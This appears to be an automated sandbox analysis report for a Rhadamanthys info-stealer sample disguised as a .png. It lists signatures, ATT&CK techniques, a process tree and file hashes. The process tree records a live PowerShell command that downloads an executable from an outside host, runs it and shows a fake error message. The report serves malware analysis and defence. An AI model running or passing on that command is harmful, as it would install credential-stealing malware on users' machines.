rhadamanthys | 10d18771311ea3d32128642debc3a5e7bfdbfa0982e0805558a87ef2497c5fb4

Resubmissions

05/08/2024, 22:15

240805-16c9xstgka 10

05/08/2024, 22:10

240805-13nw9azfjj 10

Analysis

max time kernel
569s
max time network
567s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2024, 22:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

миимссми.png
Size

932KB
MD5

c884fc194231c9b1ea1b3174a4a5d245
SHA1

ed5205b51b632191559f481f20944ebaa7cec4ad
SHA256

10d18771311ea3d32128642debc3a5e7bfdbfa0982e0805558a87ef2497c5fb4
SHA512

c22fc6fea39b9185394a64b32e0b6fcba677e9715390bb96eaac3a8a037d99252eaef9b6757cd6a771d4295ecee17e9aea6037169b5257004930b13621c73ae6
SSDEEP

24576:nUKqVB0thWSrltKGDWVSHd14F0AIAwPWTRawTS5z+2:UKyBcjEoHd5/AwOT/cj

Score

10^/10

rhadamanthys discovery execution stealer

Malware Config

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 180 created 2816	180	BitLockerToGo.exe	49

Blocklisted process makes network request 2 IoCs

flow	pid	Process
74	3656	powershell.exe
76	4344	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4072	~.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
3656	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4072 set thread context of 180	4072	~.exe	129

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3656	180	WerFault.exe	129
1620	180	WerFault.exe	129

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133673694945777346"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3352	chrome.exe
3352	chrome.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
4344	powershell.exe
4344	powershell.exe
4344	powershell.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
1864	chrome.exe
1864	chrome.exe
1864	chrome.exe
1864	chrome.exe
180	BitLockerToGo.exe
180	BitLockerToGo.exe
3920	openwith.exe
3920	openwith.exe
3920	openwith.exe
3920	openwith.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
840	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe
Token: SeShutdownPrivilege	3352	chrome.exe
Token: SeCreatePagefilePrivilege	3352	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe
840	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3352 wrote to memory of 1908	3352	chrome.exe	90
PID 3352 wrote to memory of 1908	3352	chrome.exe	90
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 1760	3352	chrome.exe	91
PID 3352 wrote to memory of 2636	3352	chrome.exe	92
PID 3352 wrote to memory of 2636	3352	chrome.exe	92
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93
PID 3352 wrote to memory of 944	3352	chrome.exe	93

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2816
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3920

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\миимссми.png
1⤵
PID:2212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff220ccc40,0x7fff220ccc4c,0x7fff220ccc58
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1948 /prefetch:2
  2⤵
  PID:1760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2488 /prefetch:8
  2⤵
  PID:944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4604,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4828 /prefetch:8
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4932 /prefetch:8
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4852,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4508,i,6026915226066513474,7642532517027241343,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5216 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1864

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:4112
- C:\Windows\system32\cmd.exe
  cmd /c start /min powershell.exe $path='C:\Users\Admin\AppData\Local\Temp\~.exe';iwr https://mickbiz.com/1.exe -outfile $path; start-process $path; msg * Unknown error!
  2⤵
  PID:2564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe $path='C:\Users\Admin\AppData\Local\Temp\~.exe';iwr https://mickbiz.com/1.exe -outfile $path; start-process $path; msg * Unknown error!
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\~.exe
      "C:\Users\Admin\AppData\Local\Temp\~.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4072
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:180
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 180 -s 432
        6⤵
        Program crash
        
        PID:3656
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 180 -s 452
        6⤵
        Program crash
        
        PID:1620
  - - C:\Windows\system32\msg.exe
      "C:\Windows\system32\msg.exe" * Unknown error!
      4⤵
      PID:3916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4344
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min powershell.exe =%tmp%\~.exe
  2⤵
  PID:4984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe =C:\Users\Admin\AppData\Local\Temp\~.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 180 -ip 180
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 180 -ip 180
1⤵
PID:2300

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2560

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:840

C:\Windows\System32\0zy1bv.exe
"C:\Windows\System32\0zy1bv.exe"
1⤵
PID:4496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
b992b31547d162f3bd21d8c2742fbbb4

SHA1
f9b99942f1f6d9fedbc8f5765f868fb531ae710a

SHA256
c63bba4aaad4bae2c643d5b3d3e4fef95d6369c8838db3898959c5bc441e370b

SHA512
4b54ee5d5efa613fdd460b29ed5146722fa70b5cae580412fdbdaf5a92bd2eb4829ecba7dac98adf956f02b1afd27555eec3a586e42391fe2fc1ee1d1b566169

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
29005275a6ebd07dabc0e7d1b2e15dff

SHA1
e24b7464f07539e01c6c53f7e5c812d3d676c539

SHA256
e2d9f17b0a66a010de2b906ee5566c57e1a100876c13542612e2aa5bd93113f4

SHA512
183dd564f4f98a704b3577adf232c6487f3dec235a68319266ea704fb0ab192e978817fbce65da3d118293280b9777037cf63c608734e33670eda9d916511181

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
70903bd37661c99a8f4a6e5cec8245cb

SHA1
de688fba45606e7d79b0d6adc64c7c6a96771681

SHA256
22e58840492585c8ca58c1b63b7f8308c0a4d6217220b3bfd90d77d501b4e6fd

SHA512
d746abaea7aa405ef84e29888228eb75af60346d304a88c16527358b936b047b1731620d727844ff9201ea54844d43c78e70953bba5c1824828263dd5491b3bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
a08873181cff62120117a24136b819ca

SHA1
45bc938e9f2fb34456204b36028d6748b4a884cc

SHA256
49ac4fef713aab96e39a9dd3e7807da720c103829b977e505a9f0b856316d440

SHA512
0f05b187fcb05a31da74bff4fe05fcb0976acf7862ccdae8d7a14beb4cc815cfde07f16a30c26db50fdcef975a3fb91f6646503128ce32c2b0ffb93e45139946

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
519B

MD5
ed4b81552017be916fe2e091898ff099

SHA1
61ac372baebb33d8f9cce7bcb5b36ac1ce6def58

SHA256
3f3f555d07afdc968fa4c225e0a5dee3145d0e36c2bdd0f68b2e31f9de77d6fa

SHA512
6267467d7070e9d18fa08a7282de6f84beaa0a72970ad468af729a7bd0e366b126dd0554555da75a9c0f1a337d7e77996656eb6a58584e5adc97720204494ec0

